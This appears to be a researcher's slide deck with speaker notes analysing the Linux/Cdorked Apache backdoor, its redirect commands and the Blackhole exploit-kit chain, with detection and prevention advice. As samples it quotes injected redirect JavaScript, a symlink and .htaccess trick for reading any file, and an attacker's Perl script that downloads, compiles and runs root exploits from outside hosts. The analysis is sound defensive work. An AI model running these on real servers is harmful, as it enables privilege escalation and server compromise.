Linux/CDorked

A server-side malware campaign

:~$ whoami

What is this Cdorked thing anyway?

Linux/Cdorked.A is a backdoor, used by malicious actor to serve malicious content from legitimate websites."

This malware does not propagate by itself and it does not exploit a vulnerability in a specific software."

How did this started?

Tonight

Why should you care?

Notes
  • this thing is stealthy
  • biz also: not good if you infect your own organization
  • They’ve got an httpd privileged shell!!
    • but how did they installed it? A: root

High-level description

Notes

You have to be motivated to support all these webservers

Prevalence

Lets get technical

Stealth

Notes
  • no logs is actually possible because it is not a module and can affect the logging chain
  • harcoded C2: as opposed to most other threat we encounter. possible because nature of webserver.
  • obfusc HTTP: and these skip the webserver’s usual logging mechanisms

Stealth++

Found in the wild doing:

Notes
  • Languages: no JP, finnish, russian, ukrainian, kazakh or belarusian

Shared memory

Command channels

Two main command channels

Backdoor

backdoor.jpg
Notes

Backdoor component

Notes
  • hence the name

XOR obfuscation

h = headers
ip = (h['X-Real-IP'] || h['X-Forwarded-For'] || h['Remote-addr'])
ip = socket.inet_aton(ip)
xorkey = array.array('c', (
    (ord(ip[0]) + w) % 256,
    (ord(ip[1]) + x) % 256,
    (ord(ip[2]) + y) % 256,
    (ord(ip[3]) + z) % 256))
command = xor_decrypt(query_string, xorkey)

Since we can control X-Real-IP or
X-Forwarded-For a 0x00000000 key can be constructed

Backdoor quirks

Malicious payload

HTTP Location redirect

Controlling it

Command Description

L1, D1

Load or delete the list of redirect URL

L2, D2

Load or delete the list of blacklisted IP ranges

L3, D3

Load or delete the list of User-Agent whitelist pattern

L4, D4

Load or delete the list of User-Agent blacklist pattern

L5, D5

Load or delete the list of Referer whitelist pattern

L6, D6

Load or delete the list of blacklisted IP

L7, D7

Load or delete the list of request excluded pages

L8, D8

Load or delete the list of whitelisted IP ranges

L9, D9

Load or delete the list of Accept-Language blacklisted patterns

LA, DA

Load or delete the list of request whitelisted pages

ST

Print server stats

DU

Clear the list of redirected IPs

T1

A timestamp

Notes

23 commands available to affect redirection conditions

Staying under the radar

Not too aggressive

Only redirects victims once

Lastly

Redirection control mechanism

The query must have:

Notes
  • Varies per sample
  • With hex-encoded command in the query portion

Beyond Cdorked

Let’s see how the campaign we are tracking right now behaves. You have an idea for a cool name?

But first…

Notes
blackhole.jpg
Notes

Blackhole background

Notes
  • We believe the real server is usually hidden behind reverse-proxy on compromised site

Redirection chain

Location: hxxp://dcb84fc82e1f7b01.xxxxxxgsm.be/index.php?j=anM9MSZudmNiaW11Zj1jY3Zja3FqdSZ0aW1lPTEzMDQxNjE4MjctMzYwNDUzNjUwJnNyYz0yMzImc3VybD13d3cuaW5mZWN0ZWRzZXJ2ZXIuY29tJnNwb3J0PTgwJmtleT0xM0Q5MDk1MCZzdXJpPS9mb3J1bS93Y2YvanMvM3JkUGFydHkvcHJvdG9hY3Vsb3VzLjEuOC4yLm1pbi5qcw==

Yes, Base64!

js=1&nvcbimuf=ccvckqju&time=1304161827-360453650&src=232&surl=www.infectedserver.com&sport=80&key=13D90950&suri=/forum/wcf/js/3rdParty/protoaculous.1.8.2.min.js

Example first javascript redirection

var iflag = "0"; if (top!=self) { iflag = "1"; };
var b64str = "MTQxNDExMzA1MDIyMjQ4M...luLmNvbS9zb3J0LnBocA==";
setTimeout ( function() {
    location.replace( "hxxp://ae334b05c4249f38" + iflag + b64dec(b64str) );
}, 280);

generated-domain.png

Notes

Why extended DNS? Not sure but: * keep client side state (timestamp) * operator think it’s stealthy?

Example iframe injection

function gotime() { xflag=false; top.location.replace(b64dec("aHR0cDovL2FlMzM0YjA1YzQyNDlmM...
...cD94PTEzNyZ0PXRpbWVvdXQ=")); };
var timer=setTimeout("gotime()", 21000);
var ewq;
ewq=document.createElement("span");
ewq.innerHTML=b64dec("PGlmcmFtZSBzcmM9Im...1lPjxicj4=");
setTimeout(function() { document.body.insertBefore(ewq,document.body.lastChild); }, 504);
aHr...XQ= : hxxp://ae334b05c4249f38014141130...
...50222483098587bcf02fc1731aade45f74550b.somedomain.com/exit.php?x=137&t=timeout
< .. content .. >

Leading you to a blackhole exploit kit

Other devices?

Saw iPhone, iPad explicitly redirected to porn

Notes
  • monetization?

Let’s recap

You go to your favorite site

catoverflow.png

Demo

Notes

While researching this

Compare XORs

CDorked XOR SSHDoor XOR

cdorked-xor.png

sshdoor-xor.png

Quite complex server-side operation

Tracking

Tracking changes

Some numbers

info-last-hits.png

Ongoing investigation

Expect blog posts with more information soon!

How did we get there?

Notes
  • Please please send us your samples! We analyze them for free (if they are interesting)
  • added functions were actually pretty easy to spot (hash-looking names)

What can you do?

Detect it

Notes
  • latest Cdorked version not detected by it… shm perm and size changes. working on it
  • due to long lived outgoing TCP connection from Apache process

Prevent it

Verify your OS' integrity

But remember that the integrity database can be tampered with!

Notes
  • lesser known could be better
  • arguably you want to verify maybe from remote location

Build farms of Linux malware?

I don’t think so!

So don’t install gcc on production systems!

Notes
  • but actually maybe they do spread with RPMs since they are root?
  • lets discuss this over beer :)

Other ideas

Notes
  • lets discuss this over beer :)

But why are these servers getting popped in the first place?"

We don’t know…

Hypothesis

Notes
  • our industry isn’t as equipped to do server forensics
  • discuss the leaks

Escalation to root

Symlink attacks combined with

Notes
  • from FTP or httpd account
  • sucuri’s info

.htaccess

I want to read anything!

$ ln -s / /home/userX/www/root
$ cat /home/userX/www/.htaccess
Options all
DirectoryIndex Sux.html
AddType textplain .php
AddType textplain .conf
AddType textplain .sql
AddType textplain .log
AddHandler server-parsed .php
AddHandler txt .html
Require None
Satisfy Any

Privileged operations

Serialized exploitation

#! /usr/bin/perl
# Exploit tools v2.0 coded by iskorpitx (Turkish Hacker)
# linux serverlerde gecerlidir
# by iskorpitx
{
system("rm *.txt”);
system("wget http://www.euromedalex.org/profiles/a.c”);
system("gcc a.c -o ab”);
system("chmod 777 ab”);
system("./ab”);
system("./id”);
system("wget http://www.euromedalex.org/profiles/a”);
system("chmod 777 a”);
system("./a”);
system("id”);
system("rm ab.txt”);
system("wget www.cuia.net/media/ab.txt”);
system("wget www.kassfm.co.ke/cache/15704.c”);
system("gcc 15704.c -o 1704);
system("chmod 777 1704);
system("./1704);
system("id”);
...
Notes
  • Sucuri found scripts like there on servers
  • clearly not APT-style attackers ;)

Nothing new

It’s the sheer volume of badly hosted sites that makes CDorked and this campaign what it is.

Notes
  • Not much new regarding how to secure your stuff

Community reaction to Cdorked

Tools

Notes
  • The biggest article on our blog. Coverage in
  • Ars Technica
  • Slashdot

Special thanks

Conclusion

Questions?

Thank you!

References

Our own research

Sucuri’s

Others

3rd party tools